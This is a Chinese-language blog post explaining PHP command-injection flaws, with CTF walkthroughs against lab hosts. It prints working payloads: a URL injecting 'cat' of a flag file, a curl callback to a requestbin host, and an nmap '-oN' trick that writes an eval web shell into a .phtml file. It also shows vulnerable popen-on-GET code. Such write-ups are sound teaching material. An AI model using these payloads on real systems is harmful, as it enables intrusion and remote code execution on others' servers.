<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">
<meta name="google-site-verification" content="QrYuOcgHntsSXYVGvWVZS98NACE7wP7Rx3KVbK2_F1s">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-flash.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon-128x128-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Web,">





  <link rel="alternate" href="/atom.xml" title="离沫凌天๓" type="application/atom+xml">






<meta name="description" content="命令执行漏洞命令执行漏洞是指程序提供了直接执行 Shell 命令的函数的场景，当攻击者不合理使用，且开发者对用户参数未考虑安全因素的话，就会执行恶意的命令调用，被攻击者利用。 漏洞成因在编写PHP代码的过程中经常会有一些额外的需求，比如调用一个在系统中已经存在的命令，这时就需要调用一些函数来执行这些命令。 当这些代码中的参数可控的时候，恶意用户就可以插入自己想要执行的代码/命令，这些代码被执行之后">
<meta name="keywords" content="Web">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP命令执行漏洞">
<meta property="og:url" content="https://www.lintstar.top/2020/08/cb4d799d.html">
<meta property="og:site_name" content="离沫凌天๓">
<meta property="og:description" content="命令执行漏洞命令执行漏洞是指程序提供了直接执行 Shell 命令的函数的场景，当攻击者不合理使用，且开发者对用户参数未考虑安全因素的话，就会执行恶意的命令调用，被攻击者利用。 漏洞成因在编写PHP代码的过程中经常会有一些额外的需求，比如调用一个在系统中已经存在的命令，这时就需要调用一些函数来执行这些命令。 当这些代码中的参数可控的时候，恶意用户就可以插入自己想要执行的代码/命令，这些代码被执行之后">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://qiniuyun.lintstar.top/20200806103324.png">
<meta property="og:image" content="http://qiniuyun.lintstar.top/20200806103209.png">
<meta property="og:image" content="http://qiniuyun.lintstar.top/20200806102829.png">
<meta property="og:image" content="http://qiniuyun.lintstar.top/20200806111015.png">
<meta property="og:image" content="http://qiniuyun.lintstar.top/20200806111348.png">
<meta property="og:image" content="http://qiniuyun.lintstar.top/20200806113125.png">
<meta property="og:image" content="http://qiniuyun.lintstar.top/20200806112724.png">
<meta property="og:image" content="http://qiniuyun.lintstar.top/20200806113107.png">
<meta property="og:image" content="http://qiniuyun.lintstar.top/20200810225416.png">
<meta property="og:image" content="http://qiniuyun.lintstar.top/20200810225446.png">
<meta property="og:image" content="http://qiniuyun.lintstar.top/20200810225629.png">
<meta property="og:image" content="http://qiniuyun.lintstar.top/20200810225643.png">
<meta property="og:image" content="http://qiniuyun.lintstar.top/20200810225736.png">
<meta property="og:image" content="http://qiniuyun.lintstar.top/20200810225804.png">
<meta property="og:image" content="http://qiniuyun.lintstar.top/20200810225849.png">
<meta property="og:image" content="http://qiniuyun.lintstar.top/20200810230119.png">
<meta property="og:image" content="http://qiniuyun.lintstar.top/20200810230134.png">
<meta property="og:updated_time" content="2020-08-20T09:26:30.456Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="PHP命令执行漏洞">
<meta name="twitter:description" content="命令执行漏洞命令执行漏洞是指程序提供了直接执行 Shell 命令的函数的场景，当攻击者不合理使用，且开发者对用户参数未考虑安全因素的话，就会执行恶意的命令调用，被攻击者利用。 漏洞成因在编写PHP代码的过程中经常会有一些额外的需求，比如调用一个在系统中已经存在的命令，这时就需要调用一些函数来执行这些命令。 当这些代码中的参数可控的时候，恶意用户就可以插入自己想要执行的代码/命令，这些代码被执行之后">
<meta name="twitter:image" content="http://qiniuyun.lintstar.top/20200806103324.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://www.lintstar.top/2020/08/cb4d799d.html">





  <title>PHP命令执行漏洞 | 离沫凌天๓</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">离沫凌天๓</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description">花开花落 一路上起起跌跌</h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://www.lintstar.top/2020/08/cb4d799d.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="离沫凌天๓">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="离沫凌天๓">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">PHP命令执行漏洞</h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-08-10T22:00:00+08:00">
                2020-08-10
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/渗透测试/" itemprop="url" rel="index">
                    <span itemprop="name">渗透测试</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                  <span class="post-meta-divider">|</span>
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  1.2k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  5
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="命令执行漏洞"><a href="#命令执行漏洞" class="headerlink" title="命令执行漏洞"></a>命令执行漏洞</h1><p>命令执行漏洞是指程序提供了<strong>直接执行 Shell 命令的函数</strong>的场景，当攻击者不合理使用，且开发者对用户参数未考虑安全因素的话，就会<strong>执行恶意的命令调用</strong>，被攻击者利用。</p>
<h2 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h2><p>在编写PHP代码的过程中经常会有一些额外的需求，比如调用一个在系统中已经存在的命令，这时就需要调用一些函数来执行这些命令。</p>
<p>当这些代码中的参数可控的时候，恶意用户就可以插入自己想要执行的代码/命令，这些代码被执行之后就造成了漏洞。</p>
<blockquote>
<p><strong>命令字符串 → 生效命令</strong></p>
</blockquote>
<h2 id="PHP中造成命令执行漏洞的常用函数"><a href="#PHP中造成命令执行漏洞的常用函数" class="headerlink" title="PHP中造成命令执行漏洞的常用函数"></a>PHP中造成命令执行漏洞的常用函数</h2><blockquote>
<p><strong>1.string system(string <code>$</code>command[,int &amp;$return_var])</strong></p>
</blockquote>
<p>函数执行command参数所指定的命令，并且输出执行结果。</p>
<blockquote>
<p><strong>2.string exec(string <code>$</code>command[,array &amp;<code>$</code>output[,int &amp;$return_var]])</strong></p>
</blockquote>
<p>exec()执行command参数所指定的命令。</p>
<blockquote>
<p><strong>3.string shell_exec(string $cmd)</strong></p>
</blockquote>
<p>通过shell环境执行命令，并且将完整的输出以字符串的方式返回。</p>
<blockquote>
<p><strong>4.void passthru(string <code>$</code>command[,int &amp;$return_var])</strong></p>
</blockquote>
<p>执行外部程序并且显示原始输出。</p>
<blockquote>
<p><strong>5.<code></code>反引号</strong></p>
</blockquote>
<p>例如<code>ls</code>，反引号的内容会被当做系统命令执行，其中内部就是执行了 <strong>shell_exec()</strong> 函数进行处理。</p>
<blockquote>
<p><strong>6.void pcntl_exec(string <code>$</code>path[,array <code>$</code>args[,array <code>$</code>envs]])</strong></p>
</blockquote>
<p>pcntl是php的多进程处理扩展，在处理大量任务的情况下会使用到，pcntl需要额外安装。<code>$path</code>为可执行程序路径<code>(/bin/bash)</code>。<code>$args</code>表示传递给<code>$path</code>程序的参数。例如<code>pcntl_exec(“/bin/bash&quot;,array(&quot;whoami&quot;));</code>PHP中造成命令执行漏洞的常用函数</p>
<blockquote>
<p><strong>7.resource popen(string <code>$</code>command,string <code>$</code>mode)</strong></p>
</blockquote>
<p>打开一个指向进程的管道，该进程由派生给定的command命令执行而产生。例如<code>popen(&#39;whoami&gt;&gt;123.txt&#39;,&#39;r&#39;);</code></p>
<blockquote>
<p><strong>8.resource proc_open(string <code>$</code>cmd,array <code>$</code>descriptorspec,array &amp;<code>$</code>pipes[,  string<code>$</code>cwd[,array <code>$</code>env[, array <code>$</code>other_options]]])</strong></p>
</blockquote>
<p>执行一个命令，并且打开用来输入/输出的文件指针。类似popen()函数，但是<code>proc_open()</code>提供了更加强大的控制程序执行的能力。</p>
<h1 id="命令执行实战"><a href="#命令执行实战" class="headerlink" title="命令执行实战"></a>命令执行实战</h1><h2 id="Exec-command命令执行"><a href="#Exec-command命令执行" class="headerlink" title="Exec command命令执行"></a>Exec command命令执行</h2><p>题目：<a href="http://10.20.25.44:284/" target="_blank" rel="noopener">http://10.20.25.44:284/</a> 审计代码，找到命令执行点，拿到根目录下的flag。</p>
<p>代码审计看见exec.php很可疑</p>
<p><img src="http://qiniuyun.lintstar.top/20200806103324.png" alt="20200806103324"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">require</span> <span class="string">'library/MainFunction.php'</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">'&lt;link href="//cdn.bootcss.com/bootstrap/3.3.5/css/bootstrap.min.css" rel="stylesheet"&gt;'</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'&lt;link rel="stylesheet" href="assets/style.css"&gt;'</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'&lt;div class="contentBox"&gt;'</span>;</span><br><span class="line">set_time_limit(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">$c = _GET(<span class="string">'command'</span>, <span class="string">'unknow'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($c == <span class="string">'unknow'</span>) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">''</span>;</span><br><span class="line">    <span class="keyword">exit</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$handle = popen($c, <span class="string">"r"</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (ob_get_level() == <span class="number">0</span>) &#123;</span><br><span class="line">    ob_start();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> (!feof($handle)) &#123;</span><br><span class="line"></span><br><span class="line">    $buffer = fgets($handle);</span><br><span class="line">    $buffer = trim(htmlspecialchars($buffer));</span><br><span class="line"></span><br><span class="line">    <span class="keyword">echo</span> $buffer . <span class="string">"&lt;br /&gt;"</span>;</span><br><span class="line">    <span class="keyword">echo</span> str_pad(<span class="string">''</span>, <span class="number">4096</span>);</span><br><span class="line"></span><br><span class="line">    ob_flush();</span><br><span class="line">    flush();</span><br><span class="line">    sleep(<span class="number">0.001</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">pclose($handle);</span><br><span class="line">ob_end_flush();</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'&lt;/div&gt;'</span>;</span><br></pre></td></tr></table></figure>
<p><code>$c = _GET(&#39;command&#39;, &#39;unknow&#39;);</code>解释：</p>
<p><img src="http://qiniuyun.lintstar.top/20200806103209.png" alt="20200806103209"></p>
<p>使用command命令执行获取flag：</p>
<p><img src="http://qiniuyun.lintstar.top/20200806102829.png" alt="20200806102829"></p>
<h2 id="Exec-拼接-命令执行"><a href="#Exec-拼接-命令执行" class="headerlink" title="Exec 拼接 命令执行"></a>Exec 拼接 命令执行</h2><p>题目：<a href="http://10.20.25.44:285/" target="_blank" rel="noopener">http://10.20.25.44:285/</a> 审计代码，找到命令执行点，拿到根目录下的 flag。</p>
<p>审计代码：</p>
<blockquote>
<p>Find In Path搜索 exec</p>
<p>目录在：/source/pack/127.0.0.1/download.php</p>
</blockquote>
<p><img src="http://qiniuyun.lintstar.top/20200806111015.png" alt="20200806111015"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exec(<span class="string">'tar zxvf work/'</span>.$dir.<span class="string">'/'</span>.$cert.<span class="string">'.zip -C work/'</span>.$dir);</span><br></pre></td></tr></table></figure>
<p>发现dir是由site和id拼接的，所以可以命令执行：</p>
<p><img src="http://qiniuyun.lintstar.top/20200806111348.png" alt="20200806111348"></p>
<p>因为没有回显，所以要把cat的内容放到根目录下的flag.txt中方便查看，payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.20.25.44:285/source/pack/127.0.0.1/download.php?site=1&amp;id=;cat /ffffffflllllaaaaaaggggggg &gt; /var/www/html/flag.txt</span><br></pre></td></tr></table></figure>
<p><img src="http://qiniuyun.lintstar.top/20200806113125.png" alt="20200806113125"></p>
<p><code>cat /</code>然后访问:</p>
<p><img src="http://qiniuyun.lintstar.top/20200806112724.png" alt="20200806112724"></p>
<p>得到flag:</p>
<p><img src="http://qiniuyun.lintstar.top/20200806113107.png" alt="20200806113107"></p>
<h2 id="Phtml-命令执行"><a href="#Phtml-命令执行" class="headerlink" title="Phtml 命令执行"></a>Phtml 命令执行</h2><p><strong>BUUCTF 上 Web 分类的 [⽹鼎杯 2020 朱雀组]Nmap</strong></p>
<p>打开，发现是一个扫描器。</p>
<p><img src="http://qiniuyun.lintstar.top/20200810225416.png" alt="20200810225416"></p>
<p>尝试扫描一下：</p>
<p><img src="http://qiniuyun.lintstar.top/20200810225446.png" alt="20200810225446"></p>
<p>测试一下，发现 ‘ 127.0.0.1 ‘ 的效果和 127.0.0.1 一样。</p>
<p><img src="http://qiniuyun.lintstar.top/20200810225629.png" alt="20200810225629"></p>
<p><img src="http://qiniuyun.lintstar.top/20200810225643.png" alt="20200810225643"></p>
<p>猜测此处存在命令注入，则可以测试能不能注入 &amp;&amp; 符号，但似乎并不能行。&amp;符号推测被屏蔽了。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">' 127.0.0.1 &amp;&amp; curl http://http.requestbin.buuoj.cn/vfpc9rvf &amp;&amp; '</span><br></pre></td></tr></table></figure>
<p><img src="http://qiniuyun.lintstar.top/20200810225736.png" alt="20200810225736"></p>
<p>题目名字为 nmap，命令的返回格式也为 nmap，则思考是否能从 nmap 本身参数入手。<br>查询一下 nmap 的参数。</p>
<p><a href="https://nmap.org/man/zh/man-output.html" target="_blank" rel="noopener">https://nmap.org/man/zh/man-output.html</a></p>
<p><img src="http://qiniuyun.lintstar.top/20200810225804.png" alt="20200810225804"></p>
<p>有这些参数可以输出文件，那我们尝试用这些参数来输出文件试试。<br>尝试写出一个 dasctf.a。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' aa -oN dasctf.a '</span></span><br></pre></td></tr></table></figure>
<p>访问 /dasctf.a，写出成功。</p>
<p><img src="http://qiniuyun.lintstar.top/20200810225849.png" alt="20200810225849"></p>
<p>再来尝试写一个 php 试试，发现会被拦截，测试发现是 php 这个词被屏蔽了。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' &lt;?php eval($_GET[a]);?&gt; -oN dasctf.php '</span></span><br></pre></td></tr></table></figure>
<p>搜索了解到在 Apache 服务器中，phtml 也会被当成 php 处理，咱们可尝试输出<code>phtml (-oN dasctf.phtml)</code>看看不会会被解析。</p>
<p>同时对于咱们要写出的内容，同样里面有 php 也会被屏蔽，所以咱们需要使用短标签<code>(&lt;?=eval($_GET[a]);?&gt;)</code>来尝试绕过。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' &lt;?=eval($_GET[a]);?&gt; -oN dasctf.phtml '</span></span><br></pre></td></tr></table></figure>
<p>打上去，带上参数访问 dasctf.phtml，就会发现该文件被当成 php 解析，并且我们输入的参数被成功执行了。</p>
<p><img src="http://qiniuyun.lintstar.top/20200810230119.png" alt="20200810230119"></p>
<p>那么就可以拿 flag 了。</p>
<p><img src="http://qiniuyun.lintstar.top/20200810230134.png" alt="20200810230134"></p>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    离沫凌天๓
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://www.lintstar.top/2020/08/cb4d799d.html" title="PHP命令执行漏洞">https://www.lintstar.top/2020/08/cb4d799d.html</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Web/" rel="tag"><i class="fa fa-tag"></i> Web</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/08/68937ff4.html" rel="next" title="PHP代码执行漏洞">
                <i class="fa fa-chevron-left"></i> PHP代码执行漏洞
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/08/b4627abb.html" rel="prev" title="XXE 漏洞">
                XXE 漏洞 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="离沫凌天๓">
            
              <p class="site-author-name" itemprop="name">离沫凌天๓</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">19</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#命令执行漏洞"><span class="nav-number">1.</span> <span class="nav-text">命令执行漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞成因"><span class="nav-number">1.1.</span> <span class="nav-text">漏洞成因</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PHP中造成命令执行漏洞的常用函数"><span class="nav-number">1.2.</span> <span class="nav-text">PHP中造成命令执行漏洞的常用函数</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#命令执行实战"><span class="nav-number">2.</span> <span class="nav-text">命令执行实战</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Exec-command命令执行"><span class="nav-number">2.1.</span> <span class="nav-text">Exec command命令执行</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exec-拼接-命令执行"><span class="nav-number">2.2.</span> <span class="nav-text">Exec 拼接 命令执行</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Phtml-命令执行"><span class="nav-number">2.3.</span> <span class="nav-text">Phtml 命令执行</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">离沫凌天๓</span>

  
</div>

<!--

  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>

-->

<div class="busuanzi-count">
    <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="site-uv">
      <i class="fa fa-user"></i>
    来访人数：<span class="busuanzi-value" id="busuanzi_value_site_uv"></span> 
    </span>
    <div class="powered-by"></div>
    <span class="site-uv">
      <i class="fa fa-eye"></i>
    访问次数：<span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
    <!-- 博客字数统计 -->
    <span class="site-pv">
      <i class="fa fa-pencil"></i>
    全站字数：<span class="post-count">115.8k</span>
    </span>
</div>





<div class="BbeiAn-info">
   	<!--津ICP备  -->
    <a target="_blank" href="http://www.beian.miit.gov.cn/" style="color:#f0d784" rel="nofollow">津ICP备18005284</a> <!--a标签中增加nofollow属性，避免爬虫出站。-->| 
	<a target="_blank" href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=12011102000578" style="color:#f0d784;text-decoration:none;padding-left:30px;background:url(https://s1.ax1x.com/2018/09/29/ilmwIH.png) no-repeat left center" rel="nofollow">津公网安备12011102000578号</a>	  <!--这里将图标作为了背景，以使得能和后面的文字在同一行-->
</div>

<!--

  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>

-->



<!-- 在网页底部添加网站运行时间 -->
<span id="timeDate">载入天数...</span><span id="times">载入时分秒...</span>
<script>
    var now = new Date();
    function createtime() {
        var grt= new Date("05/21/2019 00:00:00");//此处修改你的建站时间或者网站上线时间
        now.setTime(now.getTime()+250);
        days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days);
        hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours);
        if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
        mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;}
        seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
        snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;}
        document.getElementById("timeDate").innerHTML = "Run for "+dnum+" Days ";
        document.getElementById("times").innerHTML = hnum + " Hours " + mnum + " m " + snum + " s";
    }
setInterval("createtime()",250);
</script>
        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  






  
  







  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
